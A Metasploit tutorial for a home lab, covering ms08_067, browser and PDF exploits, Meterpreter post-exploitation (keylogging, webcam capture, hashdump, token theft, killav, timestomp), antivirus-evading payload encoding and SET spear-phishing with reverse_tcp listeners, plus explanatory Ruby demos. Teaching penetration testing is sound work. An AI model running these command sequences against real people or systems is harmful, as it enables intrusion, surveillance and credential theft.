Metasploit Guide
Table of Contents
1. Introduction about Metasploit
2. Metasploit Basics
3. Information Gathering
4. Exploitation
5. Introduction about Meterpreter
6. Post Exploitation using Meterpreter
7. Metasploit Utilities
8. Meterpreter Scripting
9. Client Side Exploitation
10. Social Engineering Toolkit (SET)
11. Auxiliary Modules
12. Linux Exploitation
Attribution
1. http://www.offensive-security.com/metasploit-unleashed/Main_Page
2. http://www.securitytube.net/
3. http://www.metasploit.com/
4. http://en.wikipedia.org/
5. Various blogs and ethical hacking websites
Note: This document was made solely for educational purposes. Please do not use these methods for any kind of malicious activity or purpose, intentional or unintentional.
Chapter One
History of Metasploit
Metasploit was created by the security researcher HD Moore in October 2003, originally in the Perl scripting language. It quickly became popular in the information security field; the project was then rewritten in Ruby (more than 150,000 lines of code) and version 3.0 was released in 2007. In 2009 Metasploit was acquired by the security firm Rapid7. At the time of writing it ships more than 1000 exploits, 260 payloads and 460 auxiliary modules, which are used for exploiting and penetration testing target systems.
Requirements
To practise penetration testing you should set up your own lab:
1. VMware or VirtualBox.
2. BackTrack 5 R3 (a Linux distribution built for penetration testing; Metasploit comes preinstalled).
3. Metasploitable (an intentionally vulnerable operating system published by the Metasploit developers).
4. Windows XP.
5. Windows 7.
Metasploit Architecture
Libraries
1. Rex: the basic library on which most of the framework is built. It handles sockets, protocols and other low-level tasks.
2. MSF Core: provides the basic API and defines the framework itself.
3. MSF Base: provides a friendlier, simplified API on top of the core for use by the rest of the framework.
Modules:
Payload: code that runs on the target system after a successful exploit (a command shell, a Meterpreter session, and so on).
Exploit: a piece of software, chunk of data or sequence of commands that takes advantage of a bug or vulnerability.
Auxiliary modules: modules for scanning, fuzzing and other tasks that do not deliver a payload.
Encoder: transforms the payload bytes, for example to remove characters the target cannot accept or to change the payload's signature. Encoders are often described as an antivirus evasion technique, but their decoder stubs are well known to antivirus vendors, so do not rely on them for that.
Interfaces:
Metasploit has several interfaces to ease our tasks.
1. MSFConsole: the main interface used throughout this document. Open a terminal and type msfconsole; you will get a prompt like the one in the screenshot below.
Msfconsole exposes the whole framework from one prompt and is the most convenient of the interfaces. All the commands you can use in msfconsole are explained in the Metasploit Basics chapter.
2. MSFCLI
msfcli runs a single module straight from the command line, which makes it good for scripting and for chaining with other command-line tools. It is a fantastic tool when you already know the exact exploit and payload you want.
Usage:
Open a terminal, then:
1. msfcli -h (shows the help).
2. msfcli windows/smb/ms08_067_netapi O (O lists the module's options).
3. msfcli windows/smb/ms08_067_netapi RHOST=192.168.217.131 P (RHOST is the remote host, the victim's IP address; P lists the compatible payloads).
4. msfcli windows/smb/ms08_067_netapi RHOST=192.168.217.131 PAYLOAD=windows/shell/bind_tcp E (E executes the exploit against the Windows XP machine and returns a shell).
3. Armitage
Armitage is a graphical front end for Metasploit, developed by Raphael Mudge. In Armitage you can open more than one console tab and search for exploits from either the GUI or the console at the same time.
Usage:
Open a terminal and type armitage; the window shown above will appear. Exploits are found through the Attacks menu, and the appropriate payloads can be chosen for each exploit. The lower part of the Armitage window is the Metasploit console, the upper part is the GUI. Video tutorials about Armitage are available at http://www.fastandeasyhacking.com/manual
4. MSFGUI
MSFGUI is a Java-based graphical interface to the framework. Whichever interface you try, it is better to learn msfconsole first: it exposes every feature of the framework and is what the rest of this document uses.
Metasploit Editions:
Metasploit is available in three editions. The Community edition (and the underlying framework) is free of cost for everyone; Express and Pro are paid editions that add automation and reporting features on top of the framework, which is why large security consulting firms use them.
Chapter Two
Metasploit Basics
To become familiar with the Metasploit framework you should know its basic commands. Metasploit commands are classified into two types: 1. Core commands 2. Database commands. To open Metasploit, open a terminal and type msfconsole.
1. Core commands
To list these commands type ? or help at the msfconsole prompt. The important commands used during exploitation are explained below.
Useful commands
back: go back from the current exploit or module to the main msf prompt. In the screenshot I back out of the exploit (ms10_002_aurora) to the msf main prompt.
connect: connect to a host, much like netcat. Specify the host IP address and port number along with this command (connect <host> <port>).
exit and quit: leave Metasploit and return to the root shell.
irb: drop into an interactive Ruby shell inside the framework, where you can write and test your own Ruby code against the live framework.
info: display the full information about the selected module (description, targets, options, references).
unload: unload a previously loaded plugin from the framework.
resource: run the commands listed in a file, one per line, as if they were typed at the prompt. Give the file path along with this command. This is the easiest way to automate a setup you repeat often.
set and unset: set a variable for the current module, for example the payload or the target IP address. unset clears the value so you can set a new one.
setg and unsetg: set (or clear) a variable globally, so that it applies to every module you use throughout the penetration test.
show: view modules or options (show options, show payloads, show targets). It is a very useful command.
Database commands: the database is very useful for keeping track of the large amount of data a test produces and for exporting it to files. The data can be shared among the pentesting team so everyone collaborates on the same results. By default Metasploit comes with a PostgreSQL database.
db_status: show whether the console is connected to the database.
db_disconnect: disconnect from the database. Afterwards the status shows no connection.
creds: view the credentials stored in the database, including the hashed passwords collected from compromised hosts.
db_import: import results from other tools such as Nessus and Nexpose.
db_export: export our results for use in other tools.
hosts: display the hosts known to the database.
db_nmap: Nmap is a very useful tool for pentesters and network engineers, and db_nmap runs it from the console and stores the results in the database. For example, db_nmap -O 192.168.217.131 displays the open services and the operating system of the target and records them.
Chapter Three
Information gathering
"If I had eight hours to chop down a tree, I'd spend six hours sharpening my axe." - Abraham Lincoln
Information gathering is the first step in penetration testing. In this phase we gather as much information as possible about the target: the more we know, the better the chance of a successful exploit. We collect IP addresses and running services; if the target is a website we also gather subdomains, e-mail addresses, the hosting provider and the location of the server. There are two types of information gathering: 1) Active information gathering 2) Passive information gathering.
Passive information gathering: in this technique we do not interact with the target directly. We look up public records with the whois and nslookup commands; BackTrack ships many more tools for DNS reconnaissance.
whois: queries the domain registration records and returns the registrar, the registrant's contact details and the authoritative name servers. Subdomains are not in whois; they come from DNS enumeration.
These are only a few of the techniques; there are many more ways to gather information passively.
Active information gathering: here we send packets to the target ourselves, typically with nmap, so the activity can be logged on the target side. A null scan (nmap -sN) sends TCP packets with no flags set; some non-stateful firewalls let these through, so it can draw a response from a system that drops ordinary SYN scans. Note that Windows replies to such probes with a RST regardless of port state, so a null scan reports every port closed on a Windows target.
You can combine -O (OS detection) and -sV (service version detection) in one run: nmap -O -sV 192.168.217.131. These are some of the nmap commands for finding the target's open ports, services and operating system. Nmap has many more advanced options; I highly recommend the book "Nmap Cookbook" to explore them.
Chapter Four
Exploitation
Exploitation is the high point of a penetration test for every security engineer. It is a great feeling to exploit your first machine and get full control over it. Exploitation is also difficult: we need to know a lot about the target first. In this chapter I will show you how to get a shell on the target system and gain full control over the victim. Before reading this chapter please read chapter two for the basics of Metasploit. I am going to use msfconsole throughout this chapter.
Basic exploitation: I am going to use the ms08_067_netapi exploit, which targets a vulnerability in the Windows Server service reachable over SMB on port 445. You can get more information about this exploit at the link below.
http://www.metasploit.com/modules/exploit/windows/smb/ms08_067_netapi
Metasploit has a great feature, tab completion. If you do not remember the exact name of an exploit, type the beginning and press tab twice to get suggestions.
You can see it displays various exploits. Alternatively you can look for a particular exploit with the search command.
show: the show command lists exploits, payloads and encoders. Usage: show exploits, show payloads, show encoders.
Steps to exploit our first Windows machine:
Step 1: use exploit/windows/smb/ms08_067_netapi
Step 2: show options, to view the options of the exploit.
RHOST (Remote Host): the IP address of the target system.
LHOST (Local Host): our own IP address (needed by payloads that connect back to us).
Step 3: set RHOST 192.168.217.131
set and setg: set assigns a value to an option of the current module; setg sets it globally so the value is reused throughout the penetration test.
Step 4: show payloads, to list the compatible payloads, then choose one with set PAYLOAD. You will see a huge payload list. Here we use the bind shell payload windows/shell/bind_tcp: after exploitation it opens a listening port on the target (LPORT, 4444 by default) and Metasploit connects to it. Port 445 is the SMB port the exploit is delivered over, not the port the shell listens on.
Step 5: to get the shell on the target, use the command exploit. It launches the exploit and, if it succeeds, runs the payload, giving you a remote command shell on the target system.
Usage: exploit
For confirmation, check the IP address of the remote system by typing ipconfig in the shell.
Congratulations! You have exploited your first Windows machine. Now you can create folders and run files remotely on the target system. To get more out of the exploitation we will use the Meterpreter payload, which I discuss later.
Chapter Five
Introduction about Meterpreter
Meterpreter is the flagship payload of the Metasploit framework. It is delivered after a successful exploit and is designed to make post exploitation easier.
Features:
It does not start a new process but lives inside the memory of the exploited process, and it writes nothing to disk, which makes it harder to detect (harder, not impossible: memory scanning and network monitoring can still catch it). Communication between the attacker and the victim is encrypted, and the data for each task travels over its own channel inside that connection. Meterpreter has a huge set of commands to ease post exploitation and give full control over the victim system.
Here we follow the same procedure as in the exploitation chapter, except for the payload: we use Meterpreter to get a Meterpreter shell.
Step 1: use exploit/windows/smb/ms08_067_netapi
Step 2: set RHOST 192.168.217.131 (the target, as before).
Step 3: set the Meterpreter payload. Usage: set PAYLOAD windows/meterpreter/bind_tcp
Step 4: run the exploit command.
You now have a Meterpreter shell. You can do a variety of tasks from it, which I explain in the later chapters. Typing help lists the available commands.
These are only a few of the commands; there are many more, and you will come across them in the later chapters.
Chapter Six
Post Exploitation using Meterpreter
Meterpreter commands fall into these groups:
1) Core commands
2) File system commands
3) Networking commands
4) System commands
5) User interface and webcam commands
6) Priv commands
1) Core commands: the basic Meterpreter commands.
background: put the current Meterpreter session into the background and return to the msf prompt. To list the available sessions use sessions -l; to interact with a session again use sessions -i <session id>, for example sessions -i 1.
load (older name: use): load an extension into the session, like the load command in msfconsole. Usage: load espia
run: run a Meterpreter script. Usage: run <script name>, for example run checkvm.
irb: drop into a Ruby shell bound to the session, where you can script against it directly.
Channel commands: channels carry the input and output of programs executed on the target system inside the (encrypted) Meterpreter connection. We can read from, write to and interact with channels. A channel is created by executing a program with the -c (channelized) flag. Usage: execute -f explorer.exe -c
channel -l lists the open channels; channel -w <id> writes data into a channel, channel -r <id> reads from it and channel -i <id> interacts with it, where <id> is the channel id shown by channel -l (for example channel -w 1).
2) File system commands:
pwd: print the current working directory on the target; cd changes directory.
ls: list the files in the current directory.
cat: read the contents of a file. In the ls output you can find two files, credit card and email password. I created them intentionally, to demonstrate how bad it is to store confidential information in unencrypted text files.
So do not save confidential information in plain text files and do not write passwords down anywhere. If you must store them, encrypt the files. TrueCrypt was a good choice for encrypting files and volumes when this was written; it has since been discontinued, so use a maintained alternative such as VeraCrypt.
search: search for files in a folder or drive. We can also restrict the search to a file type, for example doc, txt or pdf.
3) Networking commands:
arp: display the target's ARP cache, which lists the hosts it has talked to recently.
route: display the target's routing table. This command is very useful for pivoting, where we route traffic to another network through the compromised host.
Usage: route -h
4) System commands:
sysinfo: view information about the target system (computer name, OS, architecture).
ps: list the processes running on the target.
reboot: reboot the target system. shutdown: shut down the target system. shell: drop into a native command shell on the target.
Token impersonation:
Token impersonation is a very important concept in Meterpreter. The commands below come from the incognito extension, so load incognito first. Windows access tokens are a bit like web cookies: temporary keys that hold a user's security context for the duration of a logon, so the user does not have to provide credentials every time they access a file or other object. There are two types of tokens:
1) Delegation token
2) Impersonate token
1) Delegation token: created by interactive logons, such as logging on at the console of a Windows machine or connecting by Remote Desktop. It can be used to authenticate to other systems on the network.
2) Impersonate token: created by non-interactive logons, such as mapping a network drive or running a domain logon script. It is valid only on the local machine.
Usage: list_tokens -u
You can see 4 delegation tokens and 1 impersonate token are available. Quickly check who we are with the getuid command.
Usage: getuid
Impersonate:
You can see the KALEEM-27A12BDC\ADMINISTRATOR token among the delegation tokens. Now I am going to impersonate that user.
eg: impersonate_token KALEEM-27A12BDC\\ADMINISTRATOR (the backslash is doubled because the console treats a single backslash as an escape character). You can see I now run as the Kaleem administrator account; getuid shows the new user id.
Steal token:
You can steal the token of another user's process. Usage: steal_token <process id>, for example steal_token 1234
Drop token:
You can drop the impersonated or stolen token to get back to the original context. In the picture below I first impersonate Kaleem and then use drop_token to return to NT AUTHORITY\SYSTEM.
Usage: drop_token
rev2self:
This command also reverts to the original user. Usage: rev2self
getprivs: enable all the privileges available to the current token on the victim machine.
5) User interface and webcam commands:
idletime: show how long the victim has been away from the system, that is, how long since the last keyboard or mouse input. A long idle time is a good moment to run noisy commands.
Keylogging:
All of us are curious about what the victim is typing on his system and how to record those keystrokes. The Metasploit developers have done a great job writing a built-in keylogger; we can monitor all the keystrokes typed by the victim. There are three commands in Meterpreter:
keyscan_start: start the keylogger on the victim machine.
keyscan_dump: dump the keystrokes captured so far.
keyscan_stop: stop the keylogger on the victim's system.
The keylogger only sees the desktop of the process Meterpreter is running in. To capture a user's logon password, migrate into winlogon.exe first (migrate <pid>); to capture what the user types in their session, be inside a process on that desktop, such as explorer.exe.
I ran all these commands on my victim machine (Windows XP); you can see them in the picture below.
uictl: control the victim's keyboard and mouse. We can disable either of them remotely, for example uictl disable keyboard.
Screenshot:
We can grab screenshots of the victim's machine and view what the victim is viewing. You can see my Windows machine desktop here.
Usage: screenshot
Webcam commands:
Another interesting set of commands are the webcam commands, which let you view the victim remotely. I do not have a webcam on my laptop (I am using a pretty old one), so try these on your own system. Two commands are available:
1) webcam_list: list the available webcams. Usage: webcam_list
2) webcam_snap: take a snapshot from the victim's webcam. Usage: webcam_snap
I got an error because I do not have a webcam on my laptop; it will work if you have one on yours.
6) Priv commands:
These commands are used to escalate privileges on the victim machine.
getsystem: try to elevate the session to NT AUTHORITY\SYSTEM using several built-in techniques (named pipe impersonation and token duplication). Usage: getsystem
hashdump: dump the password hashes of all local accounts from the victim system. It needs SYSTEM privileges, so run getsystem first.
The dumped hashes can be cracked with John the Ripper (the jtr_crack_fast auxiliary module wraps it), or used without cracking by passing the hash to the psexec exploit.
timestomp: change the MACE timestamps (Modified, Accessed, Created, Entry modified) of a file on the target. Attackers use this anti-forensics technique to hide when a file was dropped. Usage: timestomp -h lists the options; timestomp <file> -v shows the file's current timestamps.
Set the creation time with the -c option. Usage: timestomp <path of the file> -c "MM/DD/YYYY HH:MM:SS", for example timestomp c:\\creditcard.txt -c "08/20/1970 12:12:12"
Set the modification time with the -m option. Usage: timestomp <path of the file> -m "MM/DD/YYYY HH:MM:SS", for example timestomp c:\\creditcard.txt -m "09/12/2015 12:13:24"
Copy all the timestamps from an existing file with the -f option, so the file blends in with its neighbours. Usage: timestomp <path of our file> -f <path of existing file>, for example timestomp c:\\creditcard.txt -f c:\\ntldr
Caveat: timestomp rewrites only the $STANDARD_INFORMATION timestamps of the NTFS file record; the $FILE_NAME timestamps are left alone, and a forensic examiner compares the two to spot stomped files.
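The following Ruby script is an added example, not part of the original guide and not Metasploit code. It reproduces the idea behind timestomp -m and timestomp -f on a Linux or Unix file system, so the effect (and the detection caveat) can be studied in the lab without a Windows target. File.utime rewrites the access and modification times; the change time (ctime) is set by the kernel and cannot be chosen from user space, which is the Unix counterpart of the untouched $FILE_NAME timestamps on NTFS. The file names and contents are constructed for the demo.

```ruby
# Added example (not from the guide or from Metasploit): timestomp-style
# timestamp manipulation on a Unix file system, plus the check that catches it.
require 'tempfile'

# timestomp <file> -m "MM/DD/YYYY HH:MM:SS": set the modification time.
def stomp_mtime(path, time)
  File.utime(File.atime(path), time, path)
  File.mtime(path)
end

# timestomp <file> -f <reference>: copy access/modification times from another
# file so the dropped file blends in with its neighbours.
def copy_times(reference, target)
  ref = File.stat(reference)
  File.utime(ref.atime, ref.mtime, target)
  File.mtime(target)
end

# Detection heuristic: a file whose mtime is far older than its ctime had its
# timestamps rewritten (or was chmod/chown-ed much later; always corroborate).
# Returns the gap in days; the kernel bumps ctime on every utime() call.
def backdate_gap_days(path)
  st = File.stat(path)
  (st.ctime - st.mtime) / 86_400.0
end

# Constructed demo: create a "dropped" file, stomp it, then inspect it.
def demo
  dropped = Tempfile.new('creditcard')
  dropped.write('constructed sample content')
  dropped.close
  reference = Tempfile.new('ntldr')   # stands in for a legitimate system file
  reference.close

  stomped = stomp_mtime(dropped.path, Time.utc(1970, 8, 20, 12, 12, 12))
  gap_after_stomp = backdate_gap_days(dropped.path)
  copied = copy_times(reference.path, dropped.path)

  { stomped_mtime: stomped,
    gap_days: gap_after_stomp,
    matches_reference: copied.to_i == File.mtime(reference.path).to_i }
ensure
  dropped&.unlink
  reference&.unlink
end

if $PROGRAM_NAME == __FILE__
  r = demo
  puts "mtime after stomp: #{r[:stomped_mtime].utc}"
  puts "ctime - mtime gap: #{r[:gap_days].round} days (large gap = suspicious)"
  puts "times copied from reference: #{r[:matches_reference]}"
end
```

Run it as a normal Ruby script; the gap it reports is what a `find -newerct` style sweep or a timeline tool would flag, and the same reasoning applies to comparing $STANDARD_INFORMATION with $FILE_NAME on an NTFS image.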
Chapter Seven
Metasploit Utilities
Metasploit comes with two utilities for generating shellcode outside the framework and for re-encoding it. There are two utilities: 1. msfpayload 2. msfencode (in current versions both have been merged into msfvenom).
1. msfpayload:
With msfpayload we can generate a payload as a standalone file or as shellcode to use outside the framework, in whichever format we need: C, Ruby, JavaScript, a raw byte stream, a Windows executable (.exe) and many more.
Step 1: list the payload's options.
Step 2: fill in the options. Here I filled in LHOST and LPORT and created an .exe payload. Next I use the exploit/multi/handler module to catch the connection when the payload runs on the victim.
2. msfencode:
The payload we generated with msfpayload is fully functional, but if the victim scans it with an antivirus product it may well be detected: antivirus software looks for known signatures, and an unmodified Metasploit payload is one of the best-known signatures there is. To change the bytes, the Metasploit developers introduced msfencode, which encodes the shellcode with one of several encoders and prepends a small decoder stub. Keep in mind that the decoder stubs themselves are well known to antivirus vendors, so encoding alone, even many times over, rarely gets a payload past an up-to-date scanner; the encoders' original purpose is to avoid bad characters, not to defeat antivirus.
Usage: msfencode -h
Important options:
-c: how many times to encode, for example -c 5 encodes five times.
-e: the name of the encoder, for example -e x86/alpha_upper.
-o: the output file name, for example -o payload.exe.
-t: the output format, for example -t raw or -t exe.
-x: an alternative executable template to inject the payload into, for example -x notepad.exe.
-k: keep the template's own code running and start the payload in a new thread, for example -x notepad.exe -k. The victim sees Notepad open normally while the payload runs in the background.
The encoder list (msfencode -l) shows the available encoders; we can encode our payload with any of them. The most commonly used one is x86/shikata_ga_nai, a polymorphic XOR additive-feedback encoder whose output differs on every run.
The basic pipeline explained:
msfpayload: the command that generates the payload.
windows/meterpreter/reverse_tcp: the Meterpreter payload that connects back to us.
LHOST: my BackTrack system's IP address.
LPORT: the port the payload connects back to.
R |: R means raw output; the pipe sends the raw bytes into msfencode.
msfencode: the command that encodes the payload.
-e shikata_ga_nai: the encoder to use (full name x86/shikata_ga_nai).
-t exe: the output format, here a Windows .exe.
> payload.exe: redirect the result into a file called payload.exe.
Multi-encoding example (the line begins with the msfpayload invocation described above; only its tail survived extraction):
LPORT=444 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 8 -t raw | msfencode -e x86/shikata_ga_nai -c 9 -t exe >payload.exe
Explanation
In the above command I have chained three encoder runs:
msfencode -e x86/shikata_ga_nai -c 5 -t raw: encode 5 times with shikata_ga_nai, raw output.
msfencode -e x86/countdown -c 8 -t raw: encode 8 times with countdown, raw output.
msfencode -e x86/shikata_ga_nai -c 9 -t exe: encode 9 times with shikata_ga_nai and write an .exe.
This is called multi-encoding because several encoders are applied in turn. I did it to evade antivirus detection, but see the caveat above: every layer adds another well-known decoder stub in front of the data.
Template example explanation:
Here the payload is encoded 5 times with shikata_ga_nai and written as an .exe.
-x putty.exe: the custom executable template.
-o payload.exe: the output file name.
-k: keep the template running and start the payload in a new thread so it runs stealthily in the background.
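To make concrete what an encoder does to the payload bytes (and why -c 5 is not five times harder to detect), here is an added Ruby example that is not part of the guide and not Metasploit's encoder. It implements a simplified XOR additive-feedback scheme of the kind x86/shikata_ga_nai uses on the data: each dword is XORed with a running key and the key is then advanced by the plaintext dword, so the output depends on the key and on everything before it, and a different key gives a different output every run. The real encoder also emits a polymorphic x86 decoder stub in front of the data; that stub is what antivirus signatures match and it is not reproduced here. The sample bytes are constructed for the demo and are not a working shellcode.

```ruby
# Added example (not from the guide or from Metasploit): a simplified XOR
# additive-feedback encoder/decoder showing what msfencode does to the bytes.
MASK = 0xffffffff

# Pad to a multiple of 4 bytes with NOPs (0x90) so the data splits into dwords.
def pad(bytes)
  bytes.b + ("\x90" * ((4 - bytes.bytesize % 4) % 4)).b
end

# Encode: XOR each dword with the running key, then advance the key by the
# plaintext dword (the "additive feedback").
def encode(bytes, key)
  out = ''.b
  pad(bytes).unpack('V*').each do |plain|
    out << [plain ^ key].pack('V')
    key = (key + plain) & MASK
  end
  out
end

# Decode: what the decoder stub does at run time (xor [esi], eax / add eax, [esi]).
def decode(encoded, key)
  out = ''.b
  encoded.unpack('V*').each do |enc|
    plain = enc ^ key
    out << [plain].pack('V')
    key = (key + plain) & MASK
  end
  out
end

# "-c N": encode N times with a fresh key per pass. Decoding reverses the order,
# which is why the real tool has to stack N decoder stubs in front of the data.
def encode_layers(bytes, keys)
  keys.reduce(bytes) { |data, k| encode(data, k) }
end

def decode_layers(encoded, keys)
  keys.reverse.reduce(encoded) { |data, k| decode(data, k) }
end

def random_key
  rand(1..MASK)
end

# Constructed sample bytes (not a working shellcode), just something to encode.
SAMPLE = "\x31\xc0\x50\x68\x63\x61\x6c\x63\xcc".b

if $PROGRAM_NAME == __FILE__
  keys = Array.new(5) { random_key }          # like -c 5
  enc = encode_layers(SAMPLE, keys)
  puts "original: #{SAMPLE.unpack1('H*')}"
  puts "encoded : #{enc.unpack1('H*')}"
  puts "restored: #{decode_layers(enc, keys)[0, SAMPLE.bytesize] == SAMPLE}"
end
```

Run it twice and the encoded hex differs each time while the restored bytes are identical; that is the whole polymorphism. The decoder the victim runs is the same short routine every time, which is exactly the part a scanner signatures.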
Chapter Eight
Meterpreter scripting
Meterpreter has many built-in scripts that complete otherwise tedious tasks with a single command. We can also write our own scripts in Ruby and run them after exploitation.
You can see some of the scripts in the picture above. There are more than 200 scripts available in Metasploit for post exploitation. Now I will discuss some important ones:
1. checkvm 2. credcollect 3. keylogrecorder 4. vnc 5. webcam 6. getcountermeasure 7. killav 8. scraper 9. enum_firefox 10. file_collector 11. gettelnet 12. arp_scanner 13. hostsedit
To execute a script, use the run command followed by the script name.
Usage: run checkvm
1) checkvm: check whether the target is running in a virtual machine, and which hypervisor.
2) credcollect: collect the password hashes and tokens from the compromised system. Usage: run credcollect
3) keylogrecorder: record all keystrokes typed on the victim system to a file.
4) vnc: a very useful script. It injects a VNC server into the target and gives a remote desktop view; you can see my Windows system here. Usage: run vnc
5) webcam: enable and capture images from the target's webcam.
6) getcountermeasure: report the antivirus, host firewall and other security products configured on the target, so you know what may interfere.
7) killav: kill the antivirus processes on the victim system. Usage: run killav
8) scraper: a very handy script. It downloads system information, password hashes and the registry hives from the target.
9) enum_firefox: gather the stored passwords, cookies and history from the Firefox browser on the victim's system. Usage: run enum_firefox
10) file_collector: gather existing files from the target system, for example doc, pdf and text files.
I used several options to search for files; run file_collector -h to see them all:
-d: the directory to search.
-f: the file pattern to search for. Here I am searching for text files.
-r: search recursively.
11) gettelnet: enable a telnet service on the remote PC for later access. Usage: run gettelnet
12) arp_scanner: perform an ARP sweep of the target's local subnet to discover other hosts. This is the first step before pivoting into that network. Usage: run arp_scanner -r <network/mask>
13) hostsedit: edit the hosts file on the remote system, for example to redirect a hostname to an address you control.
Chapter Nine
Client Side Exploitation
In client side exploitation the target is not a listening service but an application on the user's machine: the browser, a PDF reader, an office suite. The user has to open something we control, so these attacks are usually combined with social engineering.
Countermeasures:
1. Update your antivirus and antispyware software.
2. Update your operating system and web browsers regularly.
3. Update your PDF reader (Adobe Reader, Foxit), media players and plugins (QuickTime, Flash) and office software (MS Word).
4. Do not visit dubious websites.
5. Download software only from the vendors' own websites; some download sites bundle spyware.
6. Firefox and Chrome users can use security add-ons such as WOT (Web Of Trust), NoScript and BetterPrivacy.
Browser based exploits: in this module our main target is the browser. Now I will demonstrate the infamous Aurora exploit (ms10_002_aurora), which targets Internet Explorer 6.
Step 1: use exploit/windows/browser/ms10_002_aurora, then type show options to view the options. We have to set SRVHOST, SRVPORT and URIPATH.
Step 2:
1) Set SRVHOST to my local address (my own system's IP address), because Metasploit hosts the malicious page itself.
2) Set SRVPORT to 80.
3) Set URIPATH to /.
4) Set windows/meterpreter/reverse_tcp as the payload.
5) Type show options to confirm the settings.
Step 3:
1) Set LHOST to my IP address.
2) Type exploit to start the malicious web server.
Step 4:
1. The malicious URL has been created. Now we have to get the victim to open it. You can see I have opened that URL in my Windows XP (victim) system.
2. You can see my Windows system has been compromised.
3. You are greeted with a Meterpreter shell.
This exploit works flawlessly against Internet Explorer 6, so it is better to update your browser.
PDF exploits: I am using the Adobe util.printf exploit (exploit/windows/fileformat/adobe_utilprintf). Type show options to view the options.
Step 2: Change the file name. Usage: set FILENAME book.pdf
Step 3: Type exploit. The malicious PDF is created and saved as /root/.msf4/local/book.pdf. Copy that PDF to your desktop with the cp command and send it to the victim using some social engineering technique.
Step 4: Set up a listener. Usage: use exploit/multi/handler, then set the same payload and LHOST/LPORT values you used when creating the PDF.
Step 5: Type exploit to start the payload handler. Whenever the victim opens the malicious PDF in a vulnerable Adobe Reader, you will be greeted with a Meterpreter shell.
Step 6:
You now have a Meterpreter shell on the Windows XP machine. Metasploit also has file-format exploits for Microsoft Word and Excel, including the 2007 and 2010 versions.
Countermeasure:
1. Update your PDF reader and office software.
2. Do not open attachments from unknown senders.
Chapter Ten
Social Engineering Toolkit (SET)
Spear-phishing module:
This module lets you craft e-mail messages and send them to a single address or to a large number of people. In this attack we use file-format exploits: we e-mail the victim an attachment, such as a malicious PDF or ZIP file, and when the victim opens it their system is compromised and we get a shell.
Step 1: Choose the spear-phishing attack vector. You can see various other modules are available too; try them yourself. SET is very easy to use: there are no commands to remember, the menus are very user friendly.
Step 2: Choose "perform a mass email attack"; it displays the available file-format exploits.
Step 3: We select the Adobe Reader buffer overflow vulnerability. You can see the different payloads that can be generated for this exploit.
Step 4: The payload has been generated. Now choose the first option to keep the same file name, or give it a name of your choice.
Step 5: Here I choose "status report" as my e-mail template and give the victim's e-mail address. Next give your own e-mail address; you can use a Gmail, Yahoo or Hotmail account, or send through your own sendmail. For the latter you must install the sendmail package on BackTrack (apt-get install sendmail) and change SENDMAIL=OFF to SENDMAIL=ON in the SET config file.
When the victim opens your e-mail and the evil attachment, their system is compromised, but you need a listener running to receive the shell.
Step 6: How to set up a listener? You use the generic handler module to listen. Steps:
1) use exploit/multi/handler
2) set payload windows/meterpreter/reverse_tcp
3) set LHOST <your system IP address>, for example set LHOST 192.168.217.133
4) set LPORT <a port number to listen on>, for example set LPORT 1234
5) exploit
When the victim opens your attachment you will be greeted with a Meterpreter shell, from which you can do many tasks.
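The listener steps above, and the bind shell used in the exploitation chapter, both come down to one question: which side opens the port and which side connects. Here is an added Ruby example, not part of the guide and not Metasploit code, that plays both roles on 127.0.0.1 inside one process: a miniature exploit/multi/handler and a miniature reverse_tcp or bind_tcp stage. The "payload" side only echoes the command it receives instead of executing it, and the port is chosen at random; LHOST, LPORT and the command strings are constructed for the demo.

```ruby
# Added example (not from the guide or from Metasploit): what multi/handler
# and a reverse_tcp / bind_tcp stage do on the wire, reduced to one exchange.
require 'socket'

HOST = '127.0.0.1'

# Connect to a port, retrying briefly in case the listening side has not bound yet.
def connect_retry(port)
  20.times do
    begin
      return TCPSocket.new(HOST, port)
    rescue Errno::ECONNREFUSED
      sleep 0.05
    end
  end
  raise "nothing listening on #{HOST}:#{port}"
end

# Handler side (attacker). reverse: we listen on LPORT and wait for the victim
# to connect back (exploit/multi/handler). bind: the victim listens, we connect.
def run_handler(mode, lport, command)
  sock = if mode == :reverse
           server = TCPServer.new(HOST, lport)
           s = server.accept
           server.close
           s
         else
           connect_retry(lport)
         end
  sock.puts(command)              # send one command down the session
  reply = sock.gets.to_s.chomp    # read the result line
  sock.close
  reply
end

# Payload side (victim). reverse: connect out to LHOST:LPORT, which most
# firewalls allow. bind: open LPORT and wait, which inbound filtering usually
# blocks, and that is why reverse payloads are preferred in practice.
def run_payload(mode, lport)
  sock = if mode == :reverse
           connect_retry(lport)
         else
           server = TCPServer.new(HOST, lport)
           s = server.accept
           server.close
           s
         end
  command = sock.gets.to_s.chomp
  sock.puts("ran: #{command}")    # a real stage would execute it and return output
  sock.close
end

# Pick a free loopback port so the demo does not collide with anything.
def free_port
  s = TCPServer.new(HOST, 0)
  port = s.addr[1]
  s.close
  port
end

# Run one full exchange and return what the handler got back.
def simulate(mode, command, lport = free_port)
  if mode == :reverse
    handler = Thread.new { run_handler(:reverse, lport, command) }
    run_payload(:reverse, lport)
    handler.value
  else
    payload = Thread.new { run_payload(:bind, lport) }
    reply = run_handler(:bind, lport, command)
    payload.join
    reply
  end
end

if $PROGRAM_NAME == __FILE__
  puts simulate(:reverse, 'whoami')     # handler listens, payload connects back
  puts simulate(:bind, 'ipconfig')      # payload listens, handler connects
end
```

The order of operations is the practical lesson: for a reverse payload the handler must be running before the victim opens the attachment (that is why the listener is set up before sending the e-mail), while for a bind payload the exploit must succeed first and the attacker connects afterwards.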
Countermeasures:
Do not open links or attachments from suspicious or unknown people. Use the WOT (Web of Trust) add-on. Update your antivirus daily.
SET has many other modules. One of them is the "Website Attack Vectors" module, which includes "Metasploit Browser Exploit", "Java Applet Attack", "Man Left in the Middle", "Tabnabbing" and many more.
Chapter Eleven
Auxiliary Modules
Auxiliary modules are not exploits. When we hear about Metasploit we always think about getting a shell on a remote system, but a penetration test involves many other tasks: scanning hosts, finding open ports, checking server configuration and misconfiguration. The framework has more than 560 auxiliary modules, including 1) scanners 2) fuzzers 3) HTTP modules 4) servers 5) DoS modules and many more. I will show you how to work with them. The modules live on disk under the framework's modules directory:
Usage: cd /opt/metasploit/msf3/modules/auxiliary
This is the main folder structure; all the auxiliary modules are arranged neatly by category, and the directory names match the module paths you type in msfconsole.
Usage: type use auxiliary/ and press tab twice to see the list of auxiliary modules.
Port scanners:
Port scanners are used to find which ports are open on the target system. Here I use the TCP port scanner to find the open ports on my Windows XP system.
Usage: use auxiliary/scanner/portscan/tcp
Type show options to view the available options.
